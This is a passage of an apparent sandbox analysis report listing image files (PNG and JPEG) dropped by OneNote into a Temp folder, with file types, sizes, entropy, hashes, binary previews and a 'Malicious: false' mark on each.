SHA-512:	326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,\|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..\|.]....s.6[..H...N@.=M..\|`...3./...I.....'..\|..K...r\|...nX...'.. .G...ib\|...MY8\|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.\|....?.^..5^}..$.. .....S.@...<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...\|....W<{...g.&'Ca

C:\Users\user\AppData\Local\Temp\{B637BFF8-E1F4-4A9E-93BA-753E7639AA2B}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	14553
Entropy (8bit):	7.951135681293377
Encrypted:	false
SSDEEP:	384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
MD5:	3E9F7D399DF9CAD3669B7A5445EF7074
SHA1:	2FBC965DC03EF9203581F595E0D7AB1734726ED7
SHA-256:	76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
SHA-512:	326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,\|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..\|.]....s.6[..H...N@.=M..\|`...3./...I.....'..\|..K...r\|...nX...'.. .G...ib\|...MY8\|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.\|....?.^..5^}..$.. .....S.@...<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...\|....W<{...g.&'Ca

C:\Users\user\AppData\Local\Temp\{B669E7B2-B462-4564-B794-00EC1401A30E}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	15740
Entropy (8bit):	6.0674556182683945
Encrypted:	false
SSDEEP:	192:Elv3GG8/OOs+GouFdxMlxjoPyerzkpuOo2vPMc62PaJseZC+BJoS/:EtNiwdxMlZoPhzkpuOo2PMc6rX8+B6+
MD5:	FFA5EC40DC9A0FD10EB9E6355142D6A6
SHA1:	3D3D6A7E086B3C610C08F1F3E3F883604F06F2A4
SHA-256:	D74C3973C8D1F7C77274691AFB1AA934940674341D7EEE563BE75E563281BDFD
SHA-512:	6FAF2A24D06E6008F3579C7CEC90C2887462BDF83FAD7372FBB74B8DE90340B580E9836F309B68A9794597A598F7DCDA661C9A58DA6D8187C69083B7A17C9CD9
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!.1.....AQ..aq.g..8...."r....2.FG..#.E..7.Rb..Cc..D.v.B..3s..$d.%5Uu..&6fW'w........................!....1Aa...d..5e.6.q...Q..."2b.c..r3DE..BRs4U.#C.S.T............?...u.&0...cV.T.I...1..=4....Ce_.g.q.=F.M:>)...k..pm..h..=........S....)Ja8x...b.).=5.q..0......k.M.....1?-.G.b&.5..Ep.8t...'...R)..ta.F$bXO]tW.b.6#.t.XWN..ZW......].....G....x&&f..'L.....7...\...'.8...~`.sa...............................................X........qo...SMk...'.V...i..hb.}&?/.k.:>l.^....>Y...<}...&.jY.Gn.MKejyV......D......gf.0....t.nw..XQ...H.B.....=8.UkR.....Hm..w..]...k...#Z...F../.gjWvf.....w.aZ].2..5..^...VZv..._.7..a.\|...:.B...,f...............~....m.;_.....-.e.y.w.[m.].bu.b.f+.E++\.....Y..7

C:\Users\user\AppData\Local\Temp\{B80CCE1A-256E-42A6-9034-ADF043635872}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2210
Entropy (8bit):	7.86853667196985
Encrypted:	false
SSDEEP:	48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
MD5:	73E38124F94AD20A2F1571FBBE11AEEC
SHA1:	87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
SHA-256:	A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
SHA-512:	320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
Malicious:	false
Preview:	.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1\|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B\|CW......sO..\.=..&3...,.

C:\Users\user\AppData\Local\Temp\{B80E750F-85F2-4D53-BE4D-72E67319F19C}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4190
Entropy (8bit):	7.94161730428269
Encrypted:	false
SSDEEP:	96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
MD5:	8B3AEC1986A522951942BA72B85CCAA0
SHA1:	7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
SHA-256:	8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
SHA-512:	8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
Malicious:	false
Preview:	.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...\|\|...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...\|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

C:\Users\user\AppData\Local\Temp\{B937F719-4C91-4247-A610-ACB92A4B9D4B}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13241
Entropy (8bit):	7.931391290415517
Encrypted:	false
SSDEEP:	384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
MD5:	01367FEEE0A83E8765E971E0D3740900
SHA1:	CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
SHA-256:	18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
SHA-512:	8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
Malicious:	false
Preview:	.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......EX........wo9..9.\|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~..U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J.w.mdv.&..@....R..o/.^..5...x.g.>..ag....GM\|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B\|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

C:\Users\user\AppData\Local\Temp\{B970ECF8-4EBB-481D-9409-18F7B1AD967D}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	8184
Entropy (8bit):	7.807848176906598
Encrypted:	false
SSDEEP:	192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
MD5:	5B386BF9A20766956A84F67F913F23D7
SHA1:	6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
SHA-256:	DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
SHA-512:	99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
Malicious:	false
Preview:	.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..\|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.\|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

C:\Users\user\AppData\Local\Temp\{BA16F6D7-6812-4A10-9E4A-44C8782F74DD}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	22634
Entropy (8bit):	7.974332204835705
Encrypted:	false
SSDEEP:	384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
MD5:	548D234C9AB4021CA5FAB7BF22502465
SHA1:	2F7495D250DC86EA99473CC342D164B859926021
SHA-256:	7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
SHA-512:	261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
Malicious:	false
Preview:	.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O\|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../\|.O........7_...Oj....\|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[\|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.\|..kv....];j\|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9\|.m.+`).\|......x..vak-].../.....G'....4.>B6$.......-o.q..L;.N+....>...=.!.Y..Q...?......7..,....}

C:\Users\user\AppData\Local\Temp\{BA4CEA1F-9D86-4E2B-A645-360F40220678}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13030
Entropy (8bit):	7.948664903731204
Encrypted:	false
SSDEEP:	384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
MD5:	17E9FF9F735102231846936F0E2BAF1A
SHA1:	9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
SHA-256:	DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
SHA-512:	71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
Malicious:	false
Preview:	.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .....z..\|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..pM......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

C:\Users\user\AppData\Local\Temp\{BAA66A29-3C40-4E38-BC2F-EA5165CBD016}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1248x1624, components 3
Category:	dropped
Size (bytes):	49224
Entropy (8bit):	7.402134460714453
Encrypted:	false
SSDEEP:	1536:orJJmT4HVnteV4FrdMiYcx7bfCb6HPdnX2:EvSMVnte8ZP1Y6Jm
MD5:	B7FC313714EDD7866F4C76527282C2B5
SHA1:	C86217B46956933FAE4A30483A63B33F34B8C503
SHA-256:	B6D25F5EB52D5C24EF6C325BD25F18E413F3E23D20413A3693749275BA4B192C
SHA-512:	038A73B7A69DD976C964F1538F5B4F7C6C64721E4F2F1A831815598FAAE84CAC53305C03F5CEA6E66ACDC110A9A5117EEE191345EA004B9576C752122F8D88F7
Malicious:	false
Preview:	......Exif..II*.................Ducky.......-.....+http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:CFCF3A6CA8A811EDBBF3936CDCD6FAAD" xmpMM:DocumentID="xmp.did:CFCF3A6DA8A811EDBBF3936CDCD6FAAD"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:CFCF3A6AA8A811EDBBF3936CDCD6FAAD" stRef:documentID="xmp.did:CFCF3A6BA8A811EDBBF3936CDCD6FAAD"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d....................................................... ..,+++,1111111111............................................!!..!!))())

C:\Users\user\AppData\Local\Temp\{BBBB401E-97A4-4D3F-B2D8-83BFBCBBA977}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 728x77, components 3
Category:	dropped
Size (bytes):	2695
Entropy (8bit):	7.434963358385164
Encrypted:	false
SSDEEP:	48:N9YMsguOZgKAz2vcaQU4R8r4BU0/Rc4nbIQdsohw13ZmFLY6KsVvMdBL2mr:/hsEgNz2v5T/rQC67SoWniHK4EdBH
MD5:	B23DE98D5B4AFC269ED7EBFDDECE9716
SHA1:	10AF507A8079293A9AE0E3B96CF63A949B4588AA
SHA-256:	646586CB71742A2369A529876B41AF6A472C35CC508D1AE5D8395D55784814F2
SHA-512:	BBACBE205EC0A4F4E3AB7E2B1DEE36FCF087DDF77C7D18B53AEA4B15984A47C64E19F9B8D8FA568620619CEA0361D94FE7ABEA6E502EC6ECAEFE957F42ED7EE8
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......M....".......................................,.......................1....!ABQRq.2a."CbS.......................................................Qa1A............?....{............i........l..-D.q.~..\|cS.S...R\..d.8,!.....]f$....Q..di.;~5......vj......MqCe..=..f^..=.}.Cm]qCd..s=..u.e..v..t'.,.....S.s..N...>.d4'.,..k...N...d..9....G...y....6J.Y.l.{Vf...^B..i.3.z....:5W#4@.S\fj.%..Mb.5.v.5......S.E..#.v.I.....I......m..H....D..\|.Y\|...W.Wf..o..U.0.E..@.T.....................................'.S../...Z......!J..1K..rI...T.f.>.+.N..o.....\..^u........e..q.qK.GXP..-...F8".;5J...]Y......j.a.,R.......J.N........z}<qu..J.)`.}X:..}.............B...[. ......,B.).b.......(Y.O....c\.o.e&.W.#Bo..N\|..N8.#J.>1D.1..b.&....q.#..UT%,.d.....m&..^...VXA..b.nbTV~.....^........q..#./.I..=Q..=..Y..Ib...VZ+......Y.........'.

C:\Users\user\AppData\Local\Temp\{BBC9E359-6C08-408A-B651-AE7911C868D7}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 40 x 650, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	647
Entropy (8bit):	6.854433034679255
Encrypted:	false
SSDEEP:	12:6v/71rwqZMXVs99W1YvpLp/Fvl+f43ocLtuplb+CrGotLRd:+wqWXVs99rpLpNvr3pIx3b
MD5:	DD876AA103BEC3AC83C769D768AD39FB
SHA1:	1833603AA9B6A7E53F9AD8A336F96CCE33088234
SHA-256:	1262DD23AD54E935CFA10FEB1BE56648E43BEF1116696CA71D87E6E033B1CA7D
SHA-512:	946DB2277213104A3B29EC4388578B05027B974A3093B4CCAD8847397AA51AE308BC6A199E5705E1F901D6E4B1BA34D8DECFD6E5B6685184A307D749D7CFAEDD
Malicious:	false
Preview:	.PNG........IHDR...(.........xk....`PLTE.........................................................................................>.S.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.)..1..7w....6.*.H`T6.ha.k.............b!....Ba..C..P.4K..@.....h.E..X....PX+.P.-.....@@"...o.O4....xZ<...B...B..,A..y.s<......b!....Ba..C..0_p. .......=..,...i. ...=.j..N...........{4+...xZ<...B....\|.....$.K<.vyE..X....PX+.P.-.:... .'p......\,...i. ...=.j........K.....%J..S+.....q..k.H.@DD.s...:..J.K.DDL.\.@`,.DD.:.(]..N....KD....A M.....F..S+.....1.sq........\.t..;..../...~k...4.DD.:..]..N....KD........@DD.s...:..J.K..[...Q....V......IEND.B`.

C:\Users\user\AppData\Local\Temp\{BC8ACE5B-5066-4E09-876A-ACC2D1D37164}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	7374
Entropy (8bit):	7.955141875077912
Encrypted:	false
SSDEEP:	192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
MD5:	70DAF02EC717AB54452FA4C707BCAC74
SHA1:	30F46FAC5E96470848C5A948162CC12455A05154
SHA-256:	58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
SHA-512:	E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
Malicious:	false
Preview:	.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..\|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..\|.\|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6.............tb.9.j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G\|.......&..0ZK1u8.H.2...Z../..P(....BA..aL\|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.\|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

C:\Users\user\AppData\Local\Temp\{BCF6C68A-A5F7-4EAF-B1C9-81BB78279758}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 613x144, components 3
Category:	dropped
Size (bytes):	29187
Entropy (8bit):	7.971308326749753
Encrypted:	false
SSDEEP:	768:RwjBOlCk+nYnGagKJWJhwMJiRO22ZIm4VXvXx1tA6BQs:i8snY3JW7uROlEfbtVL
MD5:	DF99CAAAB9A7DE97B63343E60A699AB6
SHA1:	B84334135CFB73BC6EF55F85926770D5AC6DFEA8
SHA-256:	74C131777E7C437FD654427417097BC01B0813BA8E1E50E4B937BD50A1BEBCDB
SHA-512:	5D15AAAA8B71DDFE01A7C0ADE16D9E1F5E9AAE484BCD711B38CCB103ED9564CAAC23A0031471167B660E15972D70179C2A387509B213C05D60261042A0456025
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................................................C.........................................................................e..............................................`.............................!1Qq...2ARa..."#.....3BSbr...$4C...Tcs......%&DUd...E....56Fe....................................H........................!1Qa..Aq..."b....2R...BSr..#...3..Cc....$%4...............?...b.d.8T1.;#.S.DO...~.R.......3.xe...z.6..."m..k...;.'.f.5^.....m..<$....8.R.j.D.v..>...dT..vGbt...I......sEWp.r3.. ..G...6.....w...l.S..q...b.....-R....^Zu5+u6...A..Z].:...5..Uzn.,l.L.....?%..S.+zVg7.=.s.Q.....8..:,c.......ZE...>'IF..W.0.d.......c.e.d.V.t..S$.DNR.[....g..#i.$. .U.SK2.....k...J5u u\R.....T.[4..A.O..,.T..................] .i...B.m.^f....._...{S.....<......:..\|D...+...NA....Y.^f.1\|..%K~1..B..^...S..v=.c..g.tX[..kTJ..t.gr....R..@.F....5j..2.K.9..g.1N......U...^w......>+.l.v...@N....%Qd...t.Ni.....0;lggm...K".+!.,.....[J...>..?f.]._;

C:\Users\user\AppData\Local\Temp\{BDB6412E-DD2E-41EA-B059-F8957AB6818E}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	41893
Entropy (8bit):	7.52654558351485
Encrypted:	false
SSDEEP:	768:pZvVQkUbOHxx3pvVmO5rsP5gUdXwFMuv53knzyncaXgRDqPU:pZkijV5wScXwFMYknzucaXgRyU
MD5:	F25427EFECFEE786D5A9F630726DD140
SHA1:	BC612A86FF985AB569ED1A1EA5FFC4FDB18FC605
SHA-256:	5A36960DF32817E8426BD40A88F88B04FB55B84BAEF60F1E71E0872217FDB134
SHA-512:	B102F34385196D630F198667E874F25ADBC737426FDAE0747EC799B33632E5DC92999C7C715DC84D904342738930267AB1709870BDAA842243E4C283FE5E1554
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................!.1AQ....aq......"......2...Xx..9BRr#.b3$..&..g.8....%F'G.(H.Ss..D5E..v..W..Cc.deu..7w.h.).....................!.1....A..Qaq...Ttu.6..."R..5...2B..S....bcs.Dd%&r3C...#$...Ue.............?..R...%.R...t.MQ.l...v...V]..n...Zw....M....4..F.&&bb0.:]l......ay.r<..3.l.Q^.........I54.N2.8..2s...w..r6.......[1Zh....O...9..>...B......x]...r.\.\..v..~....y.QT.3.......=....r..}.l.....o;....M..C1....w)...+o1f.]...MoA.E..s5..i.\....miGsy..m\.Zj....I'YU.\tU6La5v.>.K..m.]1.......k..0....</5v.V7lY.e.vV.+./[....f..u{....s.}.Rb.Z.....Y.6]..m....V.\